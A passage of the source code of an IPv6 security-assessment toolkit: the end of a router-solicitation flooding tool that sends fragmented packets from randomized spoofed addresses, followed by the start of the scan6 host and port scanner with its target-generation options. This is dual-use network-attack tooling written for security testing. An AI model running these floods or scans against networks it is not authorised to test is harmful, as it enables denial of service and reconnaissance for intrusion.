exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest fragment * size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - ETHER_HDR_LEN); if((nw=pcap_inject(pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw,\ (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } } }while(linkaddrs>nlinkaddr && newdata_f); sources++; }while(sources\n" "Please send any bug reports to " ); } /* * Function: print_attack_info() * * Print attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ if(floods_f) printf("Flooding the target from %u different IPv6 Source Addresses\n", nsources); if(!floods_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!idata->hsrcaddr_f)?" (randomized)":"")); } else{ if(idata->hsrcaddr_f){ if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s\n", plinkaddr); } else puts("Ethernet Source Address: randomized for each packet"); } if(ether_ntop(&(idata->hdstaddr), phdstaddr, sizeof(phdstaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", phdstaddr, \ ((!idata->hdstaddr_f)?" (all-routers multicast)":"")); if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } if(!floods_f){ printf("IPv6 Source Address: %s%s\n", psrcaddr, ((!idata->srcaddr_f)?" (randomized)":"")); } else{ printf("IPv6 Source Address: randomized, from the %s/%u prefix%s\n", psrcaddr, idata->srcpreflen, \ (!idata->srcprefix_f)?" (default)":""); } if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ perror("inet_ntop()"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s%s\n", pdstaddr, \ ((!idata->dstaddr_f)?" (all-routers link-local multicast)":"")); printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; ifragh_f) printf("Sending each packet in fragments of %u bytes (plus the Unfragmentable part)\n", nfrags); for(i=0;i Address: %s\n", \ ((floods_f && !sllopta_f)?"(randomized for each packet)":plinkaddr)); } } ipv6toolkit-2.0+ds.1/tools/rs6.h000066400000000000000000000000541254360455000164340ustar00rootroot00000000000000/* * Header file for the rs6 tool * */ ipv6toolkit-2.0+ds.1/tools/scan6.c000066400000000000000000004770011254360455000167410ustar00rootroot00000000000000/* * scan6: An IPv6 Scanning Tool * * Copyright (C) 2011-2015 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make scan6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "scan6.h" #include "ipv6toolkit.h" #include "libipv6.h" /* #define DEBUG */ /* Function prototypes */ void init_packet_data(struct iface_data *); int create_candidate_globals(struct iface_data *, struct host_list *, struct host_list *, \ struct host_list *); int find_local_globals(pcap_t *, struct iface_data *, unsigned char, const char *, struct host_list *); void free_host_entries(struct host_list *); int host_scan_local(pcap_t *, struct iface_data *, struct in6_addr *, unsigned char, \ struct host_entry *); int multi_scan_local(pcap_t *, struct iface_data *, struct in6_addr *, unsigned char, \ const char *, struct host_list *); void print_help(void); void print_port_entries(struct port_list *); int print_host_entries(struct host_list *, unsigned char); int print_unique_host_entries(struct host_list *, unsigned char); void local_sig_alarm(int); void usage(void); int validate_host_entries(pcap_t *, struct iface_data *, struct host_list *, struct host_list *); int probe_node_nd(const char *, struct ether_addr *, struct in6_addr *, struct in6_addr *,\ struct ether_addr *); int process_icmp6_response(struct iface_data *, struct host_list *, unsigned char , \ struct pcap_pkthdr *, const u_char *, unsigned char *); int valid_icmp6_response(struct iface_data *, unsigned char, struct pcap_pkthdr *,\ const u_char *, unsigned char *); int valid_icmp6_response_remote(struct iface_data *, struct scan_list *, unsigned char, \ struct pcap_pkthdr *, const u_char *, unsigned char *); int print_scan_entries(struct scan_list *); int load_ipv4mapped32_entries(struct scan_list *, struct scan_entry *, struct prefix4_entry *); int load_ipv4mapped64_entries(struct scan_list *, struct scan_entry *, struct prefix4_entry *); int load_embeddedport_entries(struct scan_list *, struct scan_entry *); int load_lowbyte_entries(struct scan_list *, struct scan_entry *); int load_oui_entries(struct scan_list *, struct scan_entry *, struct ether_addr *); int load_port_table(struct port_table_entry *, char *, unsigned int); int load_vm_entries(struct scan_list *, struct scan_entry *, struct prefix4_entry *); int load_vendor_entries(struct scan_list *, struct scan_entry *, char *); int load_knownprefix_entries(struct scan_list *, struct scan_list *, FILE *); int load_knowniid_entries(struct scan_list *, struct scan_list *, struct prefix_list *); int load_knowniidfile_entries(struct scan_list *, struct scan_list *, FILE *); int load_smart_entries(struct scan_list *, struct scan_list *); int match_strings(char *, char *); int load_bruteforce_entries(struct scan_list *, struct scan_entry *); void prefix_to_scan(struct prefix_entry *, struct scan_entry *); void print_port_entries(struct port_list *); void print_port_scan(struct port_list *, unsigned int *, int); void print_port_table(struct port_table_entry *, unsigned int); int get_next_target(struct scan_list *); int get_next_port(struct port_list *); int is_port_in_range(struct port_list *); int is_target_in_range(struct scan_list *); int send_probe_remote(struct iface_data *, struct scan_list *, struct in6_addr *, unsigned char); int send_pscan_probe(struct iface_data *, struct port_list *, struct in6_addr *, unsigned char); void reset_scan_list(struct scan_list *); int process_config_file(const char *); int is_ip6_in_scan_list(struct scan_list *, struct in6_addr *); /* Used for multiscan */ struct host_list host_local, host_global, host_candidate; struct host_entry *host_locals[MAX_IPV6_ENTRIES], *host_globals[MAX_IPV6_ENTRIES]; struct host_entry *host_candidates[MAX_IPV6_ENTRIES]; /* Used for router discovery */ struct iface_data idata; /* Variables used for learning the default router */ struct ether_addr router_ether, rs_ether; struct in6_addr router_ipv6, rs_ipv6; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; struct tcp_hdr *pkt_tcp; struct udp_hdr *pkt_udp; struct ip6_eh *pkt_eh; int result; unsigned char error_f; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[BUFFER_SIZE], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; char line[LINE_BUFFER_SIZE]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct ether_header *ethernet; unsigned int ndst=0; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned char dstpreflen; uint16_t mask; uint8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN], pv4addr[INET_ADDRSTRLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char verbose_f=FALSE; unsigned char rand_src_f=FALSE, rand_link_src_f=FALSE; unsigned char accepted_f=FALSE, configfile_f=FALSE, dstaddr_f=FALSE, hdstaddr_f=FALSE, dstprefix_f=FALSE; unsigned char print_f=FALSE, print_local_f=FALSE, print_global_f=FALSE, probe_echo_f=FALSE, probe_unrec_f=FALSE, probe_f=FALSE; unsigned char print_type=NOT_PRINT_ETHER_ADDR, scan_local_f=FALSE, print_unique_f=FALSE, localaddr_f=FALSE; unsigned char timestamps_f=FALSE; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=FALSE, dstoptuhdr_f=FALSE, dstopthdr_f=FALSE; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; /* Remote scans */ unsigned int inc=1; int ranges; struct scan_list scan_list, prefix_list, smart_list; struct scan_entry *target_list[MAX_SCAN_ENTRIES]; struct scan_entry *tgt_pref_list[MAX_PREF_ENTRIES]; struct scan_entry *smrt_pref_list[MAX_PREF_ENTRIES]; struct prefix_list iid_list; struct prefix_entry *tgt_iid_list[MAX_IID_ENTRIES]; struct port_list tcp_port_list, udp_port_list, *port_list; struct port_entry *tcp_prt_list[MAX_PORT_ENTRIES]; struct port_entry *udp_prt_list[MAX_PORT_ENTRIES]; struct port_table_entry tcp_port_table[MAX_PORT_ENTRIES]; struct port_table_entry udp_port_table[MAX_PORT_ENTRIES]; unsigned int *port_results, tcp_results[MAX_PORT_ENTRIES], udp_results[MAX_PORT_ENTRIES]; uint16_t portscanl, portscanh, portscanp, portscantemp; unsigned char dst_f=FALSE, tgt_ipv4mapped32_f=FALSE, tgt_ipv4mapped64_f=FALSE, tgt_lowbyte_f=FALSE, tgt_oui_f=FALSE; unsigned char tgt_vendor_f=FALSE, tgt_vm_f=FALSE, tgt_bruteforce_f=FALSE, tgt_range_f=FALSE, tgt_portembedded_f=FALSE; unsigned char tgt_knowniids_f=FALSE, tgt_knowniidsfile_f=FALSE, knownprefixes_f=FALSE; unsigned char vm_vbox_f=FALSE, vm_vmware_f=FALSE, vm_vmwarem_f=FALSE, v4hostaddr_f=FALSE; unsigned char v4hostprefix_f=FALSE, sort_ouis_f=FALSE, rnd_probes_f=FALSE, inc_f=FALSE, end_f=FALSE, endpscan_f=FALSE; unsigned char donesending_f=FALSE; unsigned char onlink_f=FALSE, pps_f=FALSE, bps_f=FALSE, tcpflags_f=FALSE, rhbytes_f=FALSE, srcport_f=FALSE, dstport_f=FALSE, probetype; unsigned char loop_f=FALSE, sleep_f=FALSE, smart_f=FALSE, portscan_f=FALSE, droppacket_f=FALSE, pscantype; uint16_t srcport, dstport; uint8_t tcpflags=0; unsigned long pktinterval, rate; unsigned int packetsize, rhbytes; struct prefix4_entry v4host; struct prefix_entry prefix; struct ether_addr oui; char *charstart, *charend, *lastcolon; char rangestart[MAX_RANGE_STR_LEN+1], rangeend[MAX_RANGE_STR_LEN+1]; char fname[MAX_FILENAME_SIZE], fname_f=FALSE, configfile[MAX_FILENAME_SIZE], knowniidsfile[MAX_FILENAME_SIZE]; char portsfname[MAX_FILENAME_SIZE], portsfname_f=FALSE; char knownprefixesfile[MAX_FILENAME_SIZE]; FILE *knowniids_fp, *knownprefixes_fp; char *oui_end=":00:00:00"; char oui_ascii[ETHER_ADDR_PLEN]; char vendor[MAX_IEEE_OUIS_LINE_SIZE]; unsigned int nsleep; int sel; fd_set sset, rset, wset, eset; struct timeval curtime, pcurtime, lastprobe; struct tm pcurtimetm; uint16_t service_ports_hex[]={0x21, 0x22, 0x23, 0x25, 0x49, 0x53, 0x80, 0x110, 0x123, 0x179, 0x220, 0x389, \ 0x443, 0x547, 0x993, 0x995, 0x1194, 0x3306, 0x5060, 0x5061, 0x5432, 0x6446, 0x8080}; uint16_t service_ports_dec[]={21, 22, 23, 25, 49, 53, 80, 110, 123, 179, 220, 389, \ 443, 547, 993, 995, 1194, 3306, 5060, 5061, 5432, 6446, 8080}; /* IPv6 Address Resolution */ sigjmp_buf env; unsigned int canjump; int main(int argc, char **argv){ extern char *optarg; int r; struct addrinfo hints, *res, *aiptr; struct target_ipv6 target; struct timeval timeout; char date[DATE_STR_LEN]; uint8_t ulhtype; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"local-scan", no_argument, 0, 'L'}, {"probe-type", required_argument, 0, 'p'}, {"payload-size", required_argument, 0, 'Z'}, {"src-port", required_argument, 0, 'o'}, {"dst-port", required_argument, 0, 'a'}, {"tcp-flags", required_argument, 0, 'X'}, {"print-type", required_argument, 0, 'P'}, {"port-scan", required_argument, 0, 'j'}, {"tcp-scan-type", required_argument, 0, 'G'}, {"print-unique", no_argument, 0, 'q'}, {"print-link-addr", no_argument, 0, 'e'}, {"print-timestamp", no_argument, 0, 't'}, {"retrans", required_argument, 0, 'x'}, {"timeout", required_argument, 0, 'O'}, {"rand-src-addr", no_argument, 0, 'f'}, {"rand-link-src-addr", no_argument, 0, 'F'}, {"smart", no_argument, 0, 'A'}, {"tgt-virtual-machines", required_argument, 0, 'V'}, {"tgt-low-byte", no_argument, 0, 'b'}, {"tgt-ipv4", required_argument, 0, 'B'}, {"tgt-port", no_argument, 0, 'g'}, {"tgt-ieee-oui", required_argument, 0, 'k'}, {"tgt-vendor", required_argument, 0, 'K'}, {"tgt-iids-file", required_argument, 0, 'w'}, {"tgt-iid", required_argument, 0, 'W'}, {"prefixes-file", required_argument, 0, 'm'}, {"ipv4-host", required_argument, 0, 'Q'}, {"sort-ouis", no_argument, 0, 'T'}, {"random-probes", no_argument, 0, 'N'}, {"inc-size", required_argument, 0, 'I'}, {"rate-limit", required_argument, 0, 'r'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"config-file", required_argument, 0, 'c'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:u:U:H:y:S:D:Lp:Z:o:a:X:P:j:G:qetx:O:fFV:bB:gk:K:w:W:m:Q:TNI:r:lz:c:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } srandom(time(NULL)); hoplimit=64+random()%180; init_iface_data(&idata); /* Initialize the scan_list structure (for remote scans) */ scan_list.target=target_list; scan_list.ntarget=0; scan_list.ctarget=0; scan_list.maxtarget= MAX_SCAN_ENTRIES; /* Initialize the prefix_list structure (for remote scans) */ prefix_list.target= tgt_pref_list; prefix_list.ntarget=0; prefix_list.ctarget=0; prefix_list.maxtarget= MAX_PREF_ENTRIES; /* Initialize the smart_list structure (for remote scans) */ smart_list.target= smrt_pref_list; smart_list.ntarget=0; smart_list.ctarget=0; smart_list.maxtarget= MAX_PREF_ENTRIES; /* Initialize the TCP port struture (for port scans) */ tcp_port_list.port= tcp_prt_list; tcp_port_list.nport=0; tcp_port_list.cport=0; tcp_port_list.proto= IPPROTO_TCP; tcp_port_list.maxport= MAX_PORT_ENTRIES; /* Initialize the UDP port struture (for port scans) */ udp_port_list.port= tcp_prt_list; udp_port_list.nport=0; udp_port_list.cport=0; udp_port_list.proto= IPPROTO_UDP; udp_port_list.maxport= MAX_PORT_ENTRIES; /* Initialize the iid_list structure (for remote scans/tracking) */ iid_list.prefix= tgt_iid_list; iid_list.nprefix=0; iid_list.maxprefix= MAX_IID_ENTRIES; while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &idata.srcaddr) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f=TRUE; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=TRUE; } break; case 'd': /* IPv6 Destination Address/Prefix */ if(!address_contains_colons(optarg)){ /* The '-d' option contains a domain name */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Destination Address"); exit(EXIT_FAILURE); } strncpy(target.name, charptr, NI_MAXHOST); target.name[NI_MAXHOST-1]=0; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ prefix.len = atoi(charptr); if(prefix.len > 128){ puts("Prefix length error in IPv6 Destination Address"); exit(EXIT_FAILURE); } } else{ prefix.len= 128; } memset(&hints, 0, sizeof(hints)); hints.ai_family= AF_INET6; hints.ai_canonname = NULL; hints.ai_addr = NULL; hints.ai_next = NULL; hints.ai_socktype= SOCK_DGRAM; if( (target.res = getaddrinfo(target.name, NULL, &hints, &res)) != 0){ printf("Unknown Destination '%s': %s\n", target.name, gai_strerror(target.res)); exit(1); } for(aiptr=res; aiptr != NULL; aiptr=aiptr->ai_next){ if(aiptr->ai_family != AF_INET6) continue; if(aiptr->ai_addrlen != sizeof(struct sockaddr_in6)) continue; if(aiptr->ai_addr == NULL) continue; prefix.ip6= ( (struct sockaddr_in6 *)aiptr->ai_addr)->sin6_addr; /* If the prefix length is 128 bits (either implicitly or explicitly), we perform a smart scan */ if(smart_f || (prefix.len == 64 && !is_iid_null(&(prefix.ip6), 64))){ if(smart_list.ntarget <= smart_list.maxtarget){ if( (smart_list.target[smart_list.ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(idata.verbose_f) puts("scan6: Not enough memory"); exit(EXIT_FAILURE); } prefix_to_scan(&prefix, smart_list.target[smart_list.ntarget]); if(IN6_IS_ADDR_MULTICAST(&(smart_list.target[smart_list.ntarget]->start.in6_addr))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } if(IN6_IS_ADDR_MULTICAST(&(smart_list.target[smart_list.ntarget]->end.in6_addr))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } idata.dstaddr= smart_list.target[smart_list.ntarget]->start.in6_addr; smart_list.ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(idata.verbose_f) puts("Too many targets!"); exit(EXIT_FAILURE); } } else{ sanitize_ipv6_prefix(&(prefix.ip6), prefix.len); if(prefix_list.ntarget <= prefix_list.maxtarget){ if( (prefix_list.target[prefix_list.ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(idata.verbose_f) puts("scan6: Not enough memory"); exit(EXIT_FAILURE); } prefix_to_scan(&prefix, prefix_list.target[prefix_list.ntarget]); if(IN6_IS_ADDR_MULTICAST(&(prefix_list.target[prefix_list.ntarget]->start.in6_addr))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } if(IN6_IS_ADDR_MULTICAST(&(prefix_list.target[prefix_list.ntarget]->end.in6_addr))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } idata.dstaddr= prefix_list.target[prefix_list.ntarget]->start.in6_addr; prefix_list.ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(idata.verbose_f) puts("Too many targets!"); exit(EXIT_FAILURE); } } } freeaddrinfo(res); } else if( (ranges= address_contains_ranges(optarg)) == 1){ /* When an address range is specified, such address range is scanned, but the correspnding prefix is also employed for generating additional addresses to be scanned (EUI-64 based, etc.) */ charptr= optarg; charstart= rangestart; charend= rangeend; lastcolon= charend; while(*charptr && (optarg - charptr) <= MAX_RANGE_STR_LEN){ if(*charptr != '-'){ /* If we do not find a dash, just copy this 16-bit word to both the range start and the range end */ *charstart= *charptr; *charend= *charptr; charstart++; charend++; /* Record the address of the byte following the colon (in the range end), so that we know what to "overwrite when we find a "range */ if(*charptr==':') lastcolon= charend; charptr++; } else{ /* If we found a dash, we must "overwrite" the range end with what follows the dash */ charend= lastcolon; charptr++; while(*charptr && (optarg - charptr) <= MAX_RANGE_STR_LEN && *charptr !=':' && *charptr !='-'){ *charend= *charptr; charend++; charptr++; } } } /* Zero-terminate the strings that we have generated from the option arguements */ *charstart=0; *charend=0; tgt_range_f=TRUE; if(scan_list.ntarget <= scan_list.maxtarget){ if( (scan_list.target[scan_list.ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(idata.verbose_f) puts("scan6: Not enough memory"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, rangestart, &(scan_list.target[scan_list.ntarget]->start)) <= 0){ if(idata.verbose_f>1) puts("inet_pton(): Error converting IPv6 address from presentation to network format"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, rangeend, &(scan_list.target[scan_list.ntarget]->end.in6_addr)) <= 0){ if(idata.verbose_f>1) puts("inet_pton(): Error converting IPv6 address from presentation to network format"); exit(EXIT_FAILURE); } scan_list.target[scan_list.ntarget]->cur.in6_addr= scan_list.target[scan_list.ntarget]->start.in6_addr; /* Check whether the start address is smaller than the end address */ for(i=0;i<7; i++) if( ntohs(scan_list.target[scan_list.ntarget]->start.s6addr16[i]) > ntohs(scan_list.target[scan_list.ntarget]->end.s6addr16[i])){ if(idata.verbose_f) puts("Error in Destination Address range: Start address larger than end address!"); exit(EXIT_FAILURE); } if(IN6_IS_ADDR_MULTICAST(&(scan_list.target[scan_list.ntarget]->start.in6_addr))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } if(IN6_IS_ADDR_MULTICAST(&(scan_list.target[scan_list.ntarget]->end.in6_addr))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } idata.dstaddr= scan_list.target[scan_list.ntarget]->start.in6_addr; scan_list.ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(idata.verbose_f) puts("Too many targets!"); exit(EXIT_FAILURE); } if(prefix_list.ntarget <= prefix_list.maxtarget){ if( (prefix_list.target[prefix_list.ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(idata.verbose_f) puts("scan6: Not enough memory"); exit(EXIT_FAILURE); } /* Copy the recently added target to our prefix list */ *prefix_list.target[prefix_list.ntarget]= *scan_list.target[scan_list.ntarget - 1]; prefix_list.ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(idata.verbose_f) puts("Too many targets!"); exit(EXIT_FAILURE); } } else if(ranges == 0){ /* The '-d' option contains a prefix with the slash notation */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Destination Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(prefix.ip6)) <= 0){ puts("inet_pton(): Destination Address not valid"); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ prefix.len = atoi(charptr); if(prefix.len>128){ puts("Prefix length error in IPv6 Destination Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(prefix.ip6), prefix.len); } else{ prefix.len= 128; } /* If the Prefix length is /128 (explicitly set, or by omission), we do a smart scan */ if(smart_f || (prefix.len == 64 && !is_iid_null(&(prefix.ip6), 64))){ if(smart_list.ntarget <= smart_list.maxtarget){ if( (smart_list.target[smart_list.ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(idata.verbose_f) puts("scan6: Not enough memory"); exit(EXIT_FAILURE); } prefix_to_scan(&prefix, smart_list.target[smart_list.ntarget]); if(IN6_IS_ADDR_MULTICAST(&(smart_list.target[smart_list.ntarget]->start.in6_addr))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } if(IN6_IS_ADDR_MULTICAST(&(smart_list.target[smart_list.ntarget]->end.in6_addr))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } idata.dstaddr= smart_list.target[smart_list.ntarget]->start.in6_addr; smart_list.ntarget++; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(idata.verbose_f) puts("Too many targets!"); exit(EXIT_FAILURE); } } else{ if(prefix_list.ntarget <= prefix_list.maxtarget){ if( (prefix_list.target[prefix_list.ntarget] = malloc(sizeof(struct scan_entry))) == NULL){ if(idata.verbose_f) puts("scan6: Not enough memory"); exit(EXIT_FAILURE); } prefix_to_scan(&prefix, prefix_list.target[prefix_list.ntarget]); if(IN6_IS_ADDR_MULTICAST(&(prefix_list.target[prefix_list.ntarget]->start.in6_addr))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } if(IN6_IS_ADDR_MULTICAST(&(prefix_list.target[prefix_list.ntarget]->end.in6_addr))){ if(idata.verbose_f) puts("scan6: Remote scan cannot target a multicast address"); exit(EXIT_FAILURE); } prefix_list.ntarget++; idata.dstaddr= prefix_list.target[0]->start.in6_addr; } else{ /* If the number of "targets" has already been exceeded, it doesn't make sense to continue further, since there wouldn't be space for any specific target types */ if(idata.verbose_f) puts("Too many targets!"); exit(EXIT_FAILURE); } } } idata.dstaddr_f= TRUE; dst_f=TRUE; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=TRUE; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=TRUE; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= 